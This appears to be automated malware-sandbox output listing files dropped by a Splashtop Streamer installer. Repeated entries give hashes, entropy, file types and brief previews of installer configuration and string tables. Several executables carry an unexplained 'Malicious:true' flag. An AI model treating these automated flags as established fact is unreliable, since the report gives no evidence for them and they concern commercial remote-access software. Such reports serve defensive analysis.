                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):988
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.127699291644866
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:RjUcBbUcBIP+ijUcBIDQUcBIPEUcBIDv0zWatYh7+ifPcPvo7PZn+i4TjnPTvY:9UQUhGijU90UhMU9odOyifEIzZ+i4PPc
                                                                                                                                                                                                                                                                                                                                  MD5:5DBDCF8D475069C447F676D56327382B
                                                                                                                                                                                                                                                                                                                                  SHA1:08A0CA9150DCFA9D46370A340F000504D7772032
                                                                                                                                                                                                                                                                                                                                  SHA-256:EDAC85170F8B70F30E7F7080B34664B186B635520FFBC011CD9AB6257BAB78A8
                                                                                                                                                                                                                                                                                                                                  SHA-512:81CE6716D4F58CEA4194FA5FF42EE22C2D2686DD0A097DC384E797411587A2071A4070E3ECF5B7E9571FF5D29C2DFD0ED197B6890D70BDFECE376E7E0340CEE1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:;Unistall..[{B7C5EA94-B96A-41F5-BE95-25D78B486678}-DlgOrder]..Dlg0={B7C5EA94-B96A-41F5-BE95-25D78B486678}-MessageBox-0..Count=2..Dlg1={B7C5EA94-B96A-41F5-BE95-25D78B486678}-SdFinish-0..[{B7C5EA94-B96A-41F5-BE95-25D78B486678}-MessageBox-0]..Result=6..[{B7C5EA94-B96A-41F5-BE95-25D78B486678}-SdFinish-0]..Result=1..bOpt1=0..bOpt2=0....;Unistall 140..[{9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-DlgOrder]..Dlg0={9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-MessageBox-0..Count=2..Dlg1={9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-SdFinish-0..[{9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-SdFinish-0]..Result=1..bOpt1=0..bOpt2=0..[{9FF58A31-D391-4FEE-BBE6-61CCD093EF13}-MessageBox-0]..Result=6..[{94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-DlgOrder]..Dlg0={94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-MessageBox-0..Count=2..Dlg1={94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-SdFinish-0..[{94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-MessageBox-0]..Result=6..[{94A1911F-CD2F-4B9C-B171-2B43DCD213AA}-SdFinish-0]..Result=1..bOpt1=0..bOpt2=0..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):437800
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.973112188633512
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:lj90SzD7w142fX+Tz8uOoigpDgQ+o4io1AVmeF7+Vp6b4aFUQPy39/A1TM0nq52r:Ruo7/zz81oi6DgQ+poASaPzMUQM8MAoM
                                                                                                                                                                                                                                                                                                                                  MD5:85315AD538FA5AF8162F1CD2FCE1C99D
                                                                                                                                                                                                                                                                                                                                  SHA1:31C177C28A05FA3DE5E1F934B96B9D01A8969BBA
                                                                                                                                                                                                                                                                                                                                  SHA-256:70735B13F629F247D6AF2BE567F2DA8112039FBCED5FBB37961E53A2A3EC1EC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:877EB3238517EEB87C2A5D42839167E6C58F9CA7228847DB3D20A19FB13B176A6280C37DECDA676FA99A6CCF7469569DDC0974ECCF4AD67514FDEDF9E9358556
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [f9]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):571
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1920034114741345
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:sWCV4ygUcB2bbaxRjWIRLLN+eQ1LLmZLL7vLLB103e4ItDAdtDP4XMXLKxBo3XLc:sWCVQUNW53p5tDutDQcLKxunLKxQto
                                                                                                                                                                                                                                                                                                                                  MD5:DE10BE3435FBCAB7EECCAA67E2431619
                                                                                                                                                                                                                                                                                                                                  SHA1:7AFDB3C4C042692EA3F19F2D2275BADA7CACFBFD
                                                                                                                                                                                                                                                                                                                                  SHA-256:D193EDA99410268676293D315164FF29CD263CA0251A0238592A23A9D78476B0
                                                                                                                                                                                                                                                                                                                                  SHA-512:BDA2F23885D4BB07C328622D7F637379F63F08B57EB54C4A665FB56D5F68E61D36FF4B4E3CC2B8B2B3D3C5F2E0D3DBB581770EEC4FDDF9A8C0F4B6555AD3C1AF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[SetupDefaults]..LangID=1033..ProductCode={B7C5EA94-B96A-41F5-BE95-25D78B486678}..TempPathGuid={C9EB51E3-2723-43F9-ADE8-79DDD04C17A9}..[f9]..Function=CA_ConflictCheck..[f6]..Function=CA_Finished..[f14]..Function=CA_Init..[f5]..Function=CA_InstDone..[f1]..Function=CA_InstSSU..[f3]..Function=CA_InstSrvAndDrv..[f10]..Function=CA_PostCleanup..[f13]..Function=CA_PreCleanup..[f7]..Function=CA_PreStopProcess..[f11]..Function=CA_StopProcess..[f8]..Function=CA_UIIsMaintenance..[f4]..Function=CA_UninstSSU..[f2]..Function=CA_UninstSrvAndDrv..[f12]..Function=CA_UpdateSetting..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (332), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186494
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6614874204671106
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gSeMLR6/K41+BrChTHB8Xd12hWA/z+wuUZU6rPsHnQvvOuyMJice1VOL27p6:gmLu1xTh84W9CoeT
                                                                                                                                                                                                                                                                                                                                  MD5:1D4329601BEF6492CD3227DF5BCD5125
                                                                                                                                                                                                                                                                                                                                  SHA1:D03A3C50BA7663B52C13B54B08B9284F40E4F848
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD703470B2F35E3C4D917D3038BF806FCC7C155142D300806C95500274951EFD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0CFC1AEF000D428D1FF4F2DF41539284A048571E26A2C1A217093E593E546F5AF79BBC61BE8458021A9829A7D79F68CB8728BF942475096B53C81A66094DD7B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
Preview:COMPANY_NAME=Splashtop Inc...DN_AlwaysInstall=Always Install..IDDROP_SRS_CONFLICTED=The [ProductName] installation on this computer was failed. Make sure you've uninstalled any previously installed software before installing [ProductName]...IDPROP_EXPRESS_LAUNCH_CONDITION_ACROBAT5FOLDER=   Adobe Acrobat 5 needs to be installed for this installation to continue...IDPROP_EXPRESS_LAUNCH_CONDITION_ADOBEREADER10FOLDER=Adobe Reader 10 needs to be installed for this installation to continue...IDPROP_E
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):183856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.777994123339856
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:MIFNKUw8ALJ+C2T0FSmmiYQT4nF2E+JYjdeZ2bgA/qVzs:AUn0mT8Sc/T4F1bpxg8z
                                                                                                                                                                                                                                                                                                                                  MD5:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  SHA1:3C23414AE545D2087E5462A8994D2B87D3E6D9E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:E46C768950AAD809D04C91FB4234CB4B2E7D0B195F318719A71E967609E3BBED
                                                                                                                                                                                                                                                                                                                                  SHA-512:BBEC114913BC2F92E8DE7A4DD9513BFF31F6B0EF4872171B9B6B63FEF7FAA363CF47E63E2D710DD32E9FC84C61F828E0FAE3D48D06B76DA023241BEE9D4A6327
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1864872
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.69189927762803
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:ds4d9dfaOdWJIApJCPtjvntnSb8COevQonCLPub+7NPS:dhrWiADCPtjvntnSb8COevQonCftS
                                                                                                                                                                                                                                                                                                                                  MD5:BEFE2EF369D12F83C72C5F2F7069DD87
                                                                                                                                                                                                                                                                                                                                  SHA1:B89C7F6DA1241ED98015DC347E70322832BCBE50
                                                                                                                                                                                                                                                                                                                                  SHA-256:9652FFAE3F5C57D1095C6317AB6D75A9C835BB296E7C8B353A4D55D55C49A131
                                                                                                                                                                                                                                                                                                                                  SHA-512:760631B05EF79C308570B12D0C91C1D2A527427D51E4E568630E410B022E4BA24C924D6D85BE6462BA7F71B2F0BA05587D3EC4B8F98FCDB8BB4F57949A41743B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):353888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.39949998550144
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:jfLdZMDVq3/HvkZe6hTYYmWyQ98js8sNWo2vBg3vu:jzsDVq3/HB6hzyIhUfvBF
                                                                                                                                                                                                                                                                                                                                  MD5:0376DD5B7E37985EA50E693DC212094C
                                                                                                                                                                                                                                                                                                                                  SHA1:02859394164C33924907B85AB0AADDC628C31BF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:C9E6AF6FB0BDBEB532E297436A80EB92A2FF7675F9C777C109208EE227F73415
                                                                                                                                                                                                                                                                                                                                  SHA-512:69D79D44908F6305EEE5D8E6F815A0FEE0C6D913F4F40F0C2C9F2F2E50F24BF7859EBE12C85138D971E5DB95047F159F077AE687989B8588F76517CAB7D3E0D5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):437800
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.973112188633512
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:lj90SzD7w142fX+Tz8uOoigpDgQ+o4io1AVmeF7+Vp6b4aFUQPy39/A1TM0nq52r:Ruo7/zz81oi6DgQ+poASaPzMUQM8MAoM
                                                                                                                                                                                                                                                                                                                                  MD5:85315AD538FA5AF8162F1CD2FCE1C99D
                                                                                                                                                                                                                                                                                                                                  SHA1:31C177C28A05FA3DE5E1F934B96B9D01A8969BBA
                                                                                                                                                                                                                                                                                                                                  SHA-256:70735B13F629F247D6AF2BE567F2DA8112039FBCED5FBB37961E53A2A3EC1EC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:877EB3238517EEB87C2A5D42839167E6C58F9CA7228847DB3D20A19FB13B176A6280C37DECDA676FA99A6CCF7469569DDC0974ECCF4AD67514FDEDF9E9358556
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [f9]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):571
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1920034114741345
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:sWCV4ygUcB2bbaxRjWIRLLN+eQ1LLmZLL7vLLB103e4ItDAdtDP4XMXLKxBo3XLc:sWCVQUNW53p5tDutDQcLKxunLKxQto
                                                                                                                                                                                                                                                                                                                                  MD5:DE10BE3435FBCAB7EECCAA67E2431619
                                                                                                                                                                                                                                                                                                                                  SHA1:7AFDB3C4C042692EA3F19F2D2275BADA7CACFBFD
                                                                                                                                                                                                                                                                                                                                  SHA-256:D193EDA99410268676293D315164FF29CD263CA0251A0238592A23A9D78476B0
                                                                                                                                                                                                                                                                                                                                  SHA-512:BDA2F23885D4BB07C328622D7F637379F63F08B57EB54C4A665FB56D5F68E61D36FF4B4E3CC2B8B2B3D3C5F2E0D3DBB581770EEC4FDDF9A8C0F4B6555AD3C1AF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[SetupDefaults]..LangID=1033..ProductCode={B7C5EA94-B96A-41F5-BE95-25D78B486678}..TempPathGuid={C9EB51E3-2723-43F9-ADE8-79DDD04C17A9}..[f9]..Function=CA_ConflictCheck..[f6]..Function=CA_Finished..[f14]..Function=CA_Init..[f5]..Function=CA_InstDone..[f1]..Function=CA_InstSSU..[f3]..Function=CA_InstSrvAndDrv..[f10]..Function=CA_PostCleanup..[f13]..Function=CA_PreCleanup..[f7]..Function=CA_PreStopProcess..[f11]..Function=CA_StopProcess..[f8]..Function=CA_UIIsMaintenance..[f4]..Function=CA_UninstSSU..[f2]..Function=CA_UninstSrvAndDrv..[f12]..Function=CA_UpdateSetting..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (332), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186494
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6614874204671106
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gSeMLR6/K41+BrChTHB8Xd12hWA/z+wuUZU6rPsHnQvvOuyMJice1VOL27p6:gmLu1xTh84W9CoeT
                                                                                                                                                                                                                                                                                                                                  MD5:1D4329601BEF6492CD3227DF5BCD5125
                                                                                                                                                                                                                                                                                                                                  SHA1:D03A3C50BA7663B52C13B54B08B9284F40E4F848
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD703470B2F35E3C4D917D3038BF806FCC7C155142D300806C95500274951EFD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0CFC1AEF000D428D1FF4F2DF41539284A048571E26A2C1A217093E593E546F5AF79BBC61BE8458021A9829A7D79F68CB8728BF942475096B53C81A66094DD7B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..C.O.M.P.A.N.Y._.N.A.M.E.=.S.p.l.a.s.h.t.o.p. .I.n.c.......D.N._.A.l.w.a.y.s.I.n.s.t.a.l.l.=.A.l.w.a.y.s. .I.n.s.t.a.l.l.....I.D.D.R.O.P._.S.R.S._.C.O.N.F.L.I.C.T.E.D.=.T.h.e. .[.P.r.o.d.u.c.t.N.a.m.e.]. .i.n.s.t.a.l.l.a.t.i.o.n. .o.n. .t.h.i.s. .c.o.m.p.u.t.e.r. .w.a.s. .f.a.i.l.e.d... .M.a.k.e. .s.u.r.e. .y.o.u.'.v.e. .u.n.i.n.s.t.a.l.l.e.d. .a.n.y. .p.r.e.v.i.o.u.s.l.y. .i.n.s.t.a.l.l.e.d. .s.o.f.t.w.a.r.e. .b.e.f.o.r.e. .i.n.s.t.a.l.l.i.n.g. .[.P.r.o.d.u.c.t.N.a.m.e.].......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.C.R.O.B.A.T.5.F.O.L.D.E.R.=. . . .A.d.o.b.e. .A.c.r.o.b.a.t. .5. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.D.O.B.E.R.E.A.D.E.R.1.0.F.O.L.D.E.R.=.A.d.o.b.e. .R.e.a.d.e.r. .1.0. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):183856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.777994123339856
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:MIFNKUw8ALJ+C2T0FSmmiYQT4nF2E+JYjdeZ2bgA/qVzs:AUn0mT8Sc/T4F1bpxg8z
                                                                                                                                                                                                                                                                                                                                  MD5:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  SHA1:3C23414AE545D2087E5462A8994D2B87D3E6D9E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:E46C768950AAD809D04C91FB4234CB4B2E7D0B195F318719A71E967609E3BBED
                                                                                                                                                                                                                                                                                                                                  SHA-512:BBEC114913BC2F92E8DE7A4DD9513BFF31F6B0EF4872171B9B6B63FEF7FAA363CF47E63E2D710DD32E9FC84C61F828E0FAE3D48D06B76DA023241BEE9D4A6327
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1864872
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.69189927762803
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:ds4d9dfaOdWJIApJCPtjvntnSb8COevQonCLPub+7NPS:dhrWiADCPtjvntnSb8COevQonCftS
                                                                                                                                                                                                                                                                                                                                  MD5:BEFE2EF369D12F83C72C5F2F7069DD87
                                                                                                                                                                                                                                                                                                                                  SHA1:B89C7F6DA1241ED98015DC347E70322832BCBE50
                                                                                                                                                                                                                                                                                                                                  SHA-256:9652FFAE3F5C57D1095C6317AB6D75A9C835BB296E7C8B353A4D55D55C49A131
                                                                                                                                                                                                                                                                                                                                  SHA-512:760631B05EF79C308570B12D0C91C1D2A527427D51E4E568630E410B022E4BA24C924D6D85BE6462BA7F71B2F0BA05587D3EC4B8F98FCDB8BB4F57949A41743B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):353888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.39949998550144
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:jfLdZMDVq3/HvkZe6hTYYmWyQ98js8sNWo2vBg3vu:jzsDVq3/HB6hzyIhUfvBF
                                                                                                                                                                                                                                                                                                                                  MD5:0376DD5B7E37985EA50E693DC212094C
                                                                                                                                                                                                                                                                                                                                  SHA1:02859394164C33924907B85AB0AADDC628C31BF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:C9E6AF6FB0BDBEB532E297436A80EB92A2FF7675F9C777C109208EE227F73415
                                                                                                                                                                                                                                                                                                                                  SHA-512:69D79D44908F6305EEE5D8E6F815A0FEE0C6D913F4F40F0C2C9F2F2E50F24BF7859EBE12C85138D971E5DB95047F159F077AE687989B8588F76517CAB7D3E0D5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):437800
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.973112188633512
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:lj90SzD7w142fX+Tz8uOoigpDgQ+o4io1AVmeF7+Vp6b4aFUQPy39/A1TM0nq52r:Ruo7/zz81oi6DgQ+poASaPzMUQM8MAoM
                                                                                                                                                                                                                                                                                                                                  MD5:85315AD538FA5AF8162F1CD2FCE1C99D
                                                                                                                                                                                                                                                                                                                                  SHA1:31C177C28A05FA3DE5E1F934B96B9D01A8969BBA
                                                                                                                                                                                                                                                                                                                                  SHA-256:70735B13F629F247D6AF2BE567F2DA8112039FBCED5FBB37961E53A2A3EC1EC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:877EB3238517EEB87C2A5D42839167E6C58F9CA7228847DB3D20A19FB13B176A6280C37DECDA676FA99A6CCF7469569DDC0974ECCF4AD67514FDEDF9E9358556
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [f9]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):571
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1920034114741345
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:sWCV4ygUcB2bbaxRjWIRLLN+eQ1LLmZLL7vLLB103e4ItDAdtDP4XMXLKxBo3XLc:sWCVQUNW53p5tDutDQcLKxunLKxQto
                                                                                                                                                                                                                                                                                                                                  MD5:DE10BE3435FBCAB7EECCAA67E2431619
                                                                                                                                                                                                                                                                                                                                  SHA1:7AFDB3C4C042692EA3F19F2D2275BADA7CACFBFD
                                                                                                                                                                                                                                                                                                                                  SHA-256:D193EDA99410268676293D315164FF29CD263CA0251A0238592A23A9D78476B0
                                                                                                                                                                                                                                                                                                                                  SHA-512:BDA2F23885D4BB07C328622D7F637379F63F08B57EB54C4A665FB56D5F68E61D36FF4B4E3CC2B8B2B3D3C5F2E0D3DBB581770EEC4FDDF9A8C0F4B6555AD3C1AF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[SetupDefaults]..LangID=1033..ProductCode={B7C5EA94-B96A-41F5-BE95-25D78B486678}..TempPathGuid={C9EB51E3-2723-43F9-ADE8-79DDD04C17A9}..[f9]..Function=CA_ConflictCheck..[f6]..Function=CA_Finished..[f14]..Function=CA_Init..[f5]..Function=CA_InstDone..[f1]..Function=CA_InstSSU..[f3]..Function=CA_InstSrvAndDrv..[f10]..Function=CA_PostCleanup..[f13]..Function=CA_PreCleanup..[f7]..Function=CA_PreStopProcess..[f11]..Function=CA_StopProcess..[f8]..Function=CA_UIIsMaintenance..[f4]..Function=CA_UninstSSU..[f2]..Function=CA_UninstSrvAndDrv..[f12]..Function=CA_UpdateSetting..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (332), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186494
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6614874204671106
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gSeMLR6/K41+BrChTHB8Xd12hWA/z+wuUZU6rPsHnQvvOuyMJice1VOL27p6:gmLu1xTh84W9CoeT
                                                                                                                                                                                                                                                                                                                                  MD5:1D4329601BEF6492CD3227DF5BCD5125
                                                                                                                                                                                                                                                                                                                                  SHA1:D03A3C50BA7663B52C13B54B08B9284F40E4F848
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD703470B2F35E3C4D917D3038BF806FCC7C155142D300806C95500274951EFD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0CFC1AEF000D428D1FF4F2DF41539284A048571E26A2C1A217093E593E546F5AF79BBC61BE8458021A9829A7D79F68CB8728BF942475096B53C81A66094DD7B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
Preview:COMPANY_NAME=Splashtop Inc...DN_AlwaysInstall=Always Install..IDDROP_SRS_CONFLICTED=The [ProductName] installation on this computer was failed. Make sure you've uninstalled any previously installed software before installing [ProductName]...IDPROP_EXPRESS_LAUNCH_CONDITION_ACROBAT5FOLDER=   Adobe Acrobat 5 needs to be installed for this installation to continue...IDPROP_EXPRESS_LAUNCH_CONDITION_ADOBEREADER10FOLDER=Adobe Reader 10 needs to be installed for this installation to continue...IDPROP_E
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):183856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.777994123339856
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:MIFNKUw8ALJ+C2T0FSmmiYQT4nF2E+JYjdeZ2bgA/qVzs:AUn0mT8Sc/T4F1bpxg8z
                                                                                                                                                                                                                                                                                                                                  MD5:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  SHA1:3C23414AE545D2087E5462A8994D2B87D3E6D9E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:E46C768950AAD809D04C91FB4234CB4B2E7D0B195F318719A71E967609E3BBED
                                                                                                                                                                                                                                                                                                                                  SHA-512:BBEC114913BC2F92E8DE7A4DD9513BFF31F6B0EF4872171B9B6B63FEF7FAA363CF47E63E2D710DD32E9FC84C61F828E0FAE3D48D06B76DA023241BEE9D4A6327
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
